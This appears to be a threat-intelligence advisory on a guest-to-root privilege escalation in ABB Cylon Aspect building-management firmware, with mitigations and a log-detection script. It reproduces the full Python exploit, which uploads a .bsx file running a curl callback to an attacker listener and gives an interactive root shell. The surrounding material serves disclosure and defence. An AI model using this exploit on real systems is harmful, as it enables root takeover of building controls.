ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation
AI Analysis
Technical Summary
The ABB Cylon Aspect 3.08.03 system, a building energy management and control solution used for scalable supervisory control of building automation systems, contains a critical privilege escalation vulnerability. This vulnerability affects multiple product lines including NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, and ASPECT-Studio firmware versions up to and including 3.08.03. The core issue arises from a misconfiguration in the sudo permissions combined with an authenticated remote code execution (RCE) flaw in the firmware update mechanism. An attacker with valid user credentials (such as a guest-level account) can upload a specially crafted .bsx file via the projectUpdateBSXFileProcess.php endpoint. This file is then moved to the web root directory and executed through projectUpdateBSXExecute.php. Due to improper input validation and the sudo misconfiguration, the uploaded file is executed with root privileges, allowing the attacker to escalate from guest-level access to full root control over the system. The exploit uses standard HTTP POST and GET requests to authenticate, upload the malicious payload, and trigger its execution. The provided exploit code is written in Python 3 and automates the entire attack process, including authentication, payload upload, execution, and establishing a reverse shell connection back to the attacker. The exploit has been tested on various Linux kernel versions and hardware architectures, including ARM and x86_64, and with multiple PHP versions and web servers such as lighttpd and Apache, which indicates broad applicability across different deployment environments. The vulnerability is particularly dangerous because it requires only low-privileged credentials (guest:guest) and no user interaction beyond authentication. Once exploited, the attacker gains full system compromise, enabling unauthorized root access, arbitrary command execution, and potential persistent control over the building management system.
This could lead to manipulation of building controls, energy management, and other critical infrastructure functions managed by the ABB Cylon Aspect platform. No official patches or mitigations are currently linked, and no known exploits have been observed in the wild yet, but the availability of public exploit code significantly raises the risk of exploitation.
Potential Impact
For European organizations, especially those managing critical infrastructure such as commercial buildings, hospitals, universities, and government facilities, this vulnerability poses a severe risk. Compromise of ABB Cylon Aspect systems could allow attackers to manipulate HVAC systems, lighting, energy consumption, and other building automation functions, potentially causing operational disruptions, safety hazards, and financial losses. Unauthorized root access could also facilitate lateral movement within enterprise networks, leading to broader compromise of IT and OT environments. Given the increasing integration of building management systems with corporate networks and IoT ecosystems, exploitation could undermine confidentiality, integrity, and availability of both physical and digital assets. Additionally, attackers could leverage this foothold to exfiltrate sensitive data or launch ransomware attacks targeting facility operations. The risk is amplified by the ease of exploitation with low-privileged credentials and the lack of current patches, making timely mitigation critical.
Mitigation Recommendations
1. Immediate mitigation should focus on restricting access to the affected ABB Cylon Aspect management interfaces by implementing strict network segmentation and firewall rules to limit access to trusted administrators only.
2. Enforce strong, unique credentials for all user accounts, especially guest or low-privilege accounts, and disable or remove default accounts where possible.
3. Monitor network traffic and logs for unusual activity related to the projectUpdateBSXFileProcess.php and projectUpdateBSXExecute.php endpoints, including unexpected file uploads or executions.
4. Employ application-layer firewalls or web application firewalls (WAFs) with custom rules to detect and block attempts to upload or execute unauthorized .bsx files.
5. Conduct regular audits of sudoers configurations on affected devices to ensure no misconfigurations allow privilege escalation.
6. Engage with ABB support channels to obtain firmware updates or patches addressing this vulnerability as they become available.
7. Implement intrusion detection systems (IDS) tuned to detect exploitation attempts and anomalous command executions on building management systems.
8. Consider deploying endpoint detection and response (EDR) solutions on management servers to detect and respond to suspicious activities.
9. Educate operational technology (OT) and IT staff about this vulnerability and the importance of credential hygiene and network controls.
10. If possible, isolate building management systems from general enterprise networks to reduce attack surface and lateral movement opportunities.
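A defender-side check for recommendation 3, added here as an example that is not part of the advisory or of the exploit: it parses Apache/lighttpd combined access-log lines and flags a POST to projectUpdateBSXFileProcess.php followed by a GET to projectUpdateBSXExecute.php from the same client, which is the request order the published exploit uses. The sample log lines, the five-minute pairing window and the severity labels are constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qsl
from datetime import datetime, timedelta

# Apache/lighttpd "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
UPLOAD_EP = "/projectUpdateBSXFileProcess.php"   # endpoints named in the advisory
EXEC_EP = "/projectUpdateBSXExecute.php"
WINDOW = timedelta(minutes=5)   # upload -> execute pairing window (assumed value)

# Constructed sample log (not real traffic): the first client reproduces the
# advisory's request order, the second client is ordinary browsing.
SAMPLE_LOG = """\
192.0.2.10 - - [21/May/2025:12:33:50 +0000] "POST /validate/login.php HTTP/1.1" 200 512 "-" "NetRanger/84.19"
192.0.2.10 - - [21/May/2025:12:33:52 +0000] "POST /projectUpdateBSXFileProcess.php HTTP/1.1" 200 187 "-" "NetRanger/84.19"
192.0.2.10 - - [21/May/2025:12:33:53 +0000] "GET /projectUpdateBSXExecute.php?file=firmware.bsx HTTP/1.1" 200 64 "-" "NetRanger/84.19"
192.0.2.20 - - [21/May/2025:12:40:01 +0000] "GET /getApplicationNamesJS.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

def parse(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return ev

def detect(lines):
    """Return one alert per GET to EXEC_EP. A GET preceded within WINDOW by a
    POST to UPLOAD_EP from the same client is the advisory's full flow ('high');
    an unpaired GET is still reported ('medium') so variants stay visible."""
    last_upload = {}          # client IP -> time of most recent upload POST
    alerts = []
    for raw in lines:
        ev = parse(raw.strip())
        if ev is None:
            continue
        url = urlparse(ev["path"])
        if ev["method"] == "POST" and url.path == UPLOAD_EP:
            last_upload[ev["ip"]] = ev["ts"]
        elif ev["method"] == "GET" and url.path == EXEC_EP:
            up = last_upload.get(ev["ip"])
            paired = up is not None and ev["ts"] - up <= WINDOW
            alerts.append({
                "ip": ev["ip"],
                "severity": "high" if paired else "medium",
                "file": dict(parse_qsl(url.query)).get("file"),
                "ua": ev["ua"],
            })
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(a)
```

The User-Agent string is only recorded, not matched on, because the exploit's value is trivially changed; the endpoint sequence is the durable signal.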
Affected Countries
Germany, France, United Kingdom, Italy, Netherlands, Sweden, Belgium, Spain, Poland, Switzerland
Indicators of Compromise
- exploit-code:

#!/usr/bin/env python
#
#
# Exploit Title: ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation
#
#
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
# Firmware: <=3.08.03
#
# Summary: ASPECT is an award-winning scalable building energy management
# and control solution designed to allow users seamless access to their
# building data through standard building protocols including smart devices.
#
# Desc: The ABB BMS/BAS controller is vulnerable to code execution and sudo
# misconfiguration flaws. An authenticated remote code execution vulnerability
# in the firmware update mechanism allows an attacker with valid credentials to
# escalate privileges and execute commands as root. The process involves uploading
# a crafted .bsx file through projectUpdateBSXFileProcess.php, which is then moved
# to htmlroot and executed by projectUpdateBSXExecute.php. This script leverages
# sudo to run the uploaded bsx file, enabling the attacker to bypass input validation
# checks and execute arbitrary code, leading to full system compromise and unauthorized
# root access.
#
# ---------------------------------------------------------------------------------
#
# $ ./bsxroot.py 192.168.73.31 192.168.73.9 --creds guest:guest
# [o] Exploit starting at 21.05.2025 12:33:47
# [o] Using credentials: guest:*****
# [o] Auth successfull.
# [o] PHPSESSID: g02p9tnog4d2r1z4eha1e9e688
# [o] Listening on 192.168.73.9:5555...
# [o] Building name: ["Tower 3"]
# [o] runtime.ver=v3.08.03
# [+] -> [virtual] rootshell
#
# # id
# uid=0(root) gid=0(root) groups=0(root)
# # pwd
# /home/MIX_CMIX/htmlroot
# exit
# [o] Removing callback file.
# [!] Connection terminated.
#
# ---------------------------------------------------------------------------------
#
#
# Tested on: GNU/Linux 3.15.10 (armv7l)
#            GNU/Linux 3.10.0 (x86_64)
#            GNU/Linux 2.6.32 (x86_64)
#            Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
#            Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
#            PHP/7.3.11
#            PHP/5.6.30
#            PHP/5.4.16
#            PHP/4.4.8
#            PHP/5.3.3
#            AspectFT Automation Application Server
#            lighttpd/1.4.32
#            lighttpd/1.4.18
#            Apache/2.2.15 (CentOS)
#            OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
#            OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2025-5947
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5947.php
#
#
# 21.04.2024
#
#

from colorama import init, Fore
from urllib.parse import quote
from time import sleep
import threading
import datetime
import requests
import socket
import re
import os
import sys

init()


def safe(*trigger):
    # Safety guard left enabled by the author: main() exits before doing anything.
    return True


def auth(target_ip, user, pwd):
    # Log in through the web form and return the session cookies (PHPSESSID).
    login_ep = f"http://{target_ip}/validate/login.php"
    payload = {
        'f_user': user,  # 'aamuser, guest'
        'f_pass': pwd,   # 'default, guest'
        'submit': 'Login'
    }
    sess = requests.Session()
    r = sess.post(login_ep, data=payload)
    if r.status_code == 200 and 'PHPSESSID' in sess.cookies:
        print("[o] Auth successfull.")
        phpsessid = sess.cookies.get('PHPSESSID')
        print("[o] PHPSESSID:", phpsessid)
        return sess.cookies
    else:
        print("[!] Auth failed.")
        return None


def kacuj(target_ip, listen_ip, cmd, token=None, cookies=None):
    # Upload the .bsx file via projectUpdateBSXFileProcess.php, then trigger
    # projectUpdateBSXExecute.php; command output comes back via the listener.
    agentwho = "NetRanger/84.19"
    payload = f"curl -A \"`{cmd}`\" {listen_ip}:5555"
    url = f"http://{target_ip}/projectUpdateBSXFileProcess.php"
    headers = {
        "Content-Type": "multipart/form-data; boundary=----zeroscience",
        "User-Agent": agentwho
    }
    data = (
        "------zeroscience\r\n"
        f"Content-Disposition: form-data; name=\"userfile\"; filename={AAM}\r\n"
        "Content-Type: application/octet-stream\r\n\r\n"
        f"{payload}\r\n"
        '------zeroscience--\r\n'
    )
    try:
        r = requests.post(url, headers=headers, data=data, cookies=cookies)
        if r.status_code == 200:
            url_execute = f"http://{target_ip}/projectUpdateBSXExecute.php?file={AAM}"
            r = requests.get(url_execute, cookies=cookies)
            return r.content
    except requests.exceptions.RequestException as e:
        print(f"[!] Error sending payload: {e}")
        return None


def koj_slusha(listen_ip):
    # Callback listener: prints the User-Agent header carrying the command output.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("0.0.0.0", 5555))
    s.listen(1)
    print(f"[o] Listening on {listen_ip}:5555...")
    while True:
        conn, addr = s.accept()
        try:
            data = conn.recv(9999)
            if not data:
                print("[!] Connection closed by remote host.")
                break
            dd = data.decode("utf-8", errors="ignore")
            uam = re.search(r"User-Agent:\s*(.*)\s*Host:", dd, re.DOTALL)
            if uam:
                print(uam.group(1), end="")
            else:
                pass
                #print(f"[o] Full response:\n{dd}")
        except Exception as e:
            print(f"[!] Error while receiving data: {e}")
        finally:
            conn.close()


def main():
    if safe(True):
        print("\nSafety: \033[92mON\033[0m")
        exit(-17)
    else:
        pass
    global AAM
    global start
    AAM = "firmware.bsx"
    start = datetime.datetime.now()
    start = start.strftime("%d.%m.%Y %H:%M:%S")
    title = "\033[96mABB Cylon® ASPECT® Supervisory Building Control v3.08.03\033[0m"
    subtl = "\033[95m\t\t-> Remote Root Exploit <-\033[0m"
    # The original prints a large block-character ASCII-art banner here; it was
    # garbled in extraction, so only the heading line and titles are kept.
    prj = f"""
 P R O J E C T
{title}
{subtl}
"""
    if len(sys.argv) < 4:
        print(prj)
        print("./bsxroot.py <targetIP> <listenIP> <PHPSESSID / --creds user:pass>")
        sys.exit(-0)
    target_ip = sys.argv[1]
    listen_ip = sys.argv[2]
    auth_arg = sys.argv[3]
    print("[o] Exploit starting at", start)
    if "--creds" in sys.argv:
        creds_index = sys.argv.index("--creds") + 1
        if creds_index >= len(sys.argv):
            print("[!] Error: Missing credentials after --creds.")
            sys.exit(-1)
        user_pass = sys.argv[creds_index]
        if ":" not in user_pass:
            print("[!] Error: Invalid credentials format. Expected format: user:pass.")
            sys.exit(-2)
        user, pwd = user_pass.split(":")
        print(f"[o] Using credentials: {user}:{'*' * len(pwd)}")
        cookies = auth(target_ip, user, pwd)
    else:
        token = auth_arg
        cookies = {"PHPSESSID": token}
    if not cookies:
        sys.exit(-3)
    nishka = threading.Thread(target=koj_slusha, args=(listen_ip,))
    nishka.daemon = True
    nishka.start()
    bacname = f"http://{target_ip}/getApplicationNamesJS.php"
    r = requests.get(bacname)
    if r.status_code == 200:
        try:
            r = r.content
            decor = r.decode("utf-8")
        except UnicodeDecodeError:
            decor = r.decode("utf-8", errors="ignore")
        odg = re.search(r"var instanceDirectory=(.*?);", decor)
        if odg:
            cmd = "echo -ne \"[o] \" ; cat runtime/release.properties | grep -w 'runtime.ver'"
            print("[o] Building name:", odg.group(1))
            kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies)
            print("\033[92m[+] -> [virtual] rootshell\033[0m\n")
        else:
            print("[o] Unknown building name.")
    sleep(0.01)
    while True:
        sleep(0.01)
        cmd = input("# ")
        if cmd.lower() in ["exit", "quit"]:
            print("[o] Removing callback file.")
            kacuj(target_ip, listen_ip, "rm /tmp/" + AAM, token=None, cookies=cookies)
            print("\033[91m[!] Connection terminated.\033[0m")
            os._exit(-17)
        kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies)
    nishka.join()


if __name__ == "__main__":
    main()
Technical Details
- EDB ID: 52305
- Has exploit code: true
- Code language: python
Threat ID: 68489d9d7e6d765d51d52cc5
Added to database: 6/10/2025, 9:03:25 PM
Last enriched: 6/11/2025, 9:15:30 PM
Last updated: 7/31/2025, 3:21:56 PM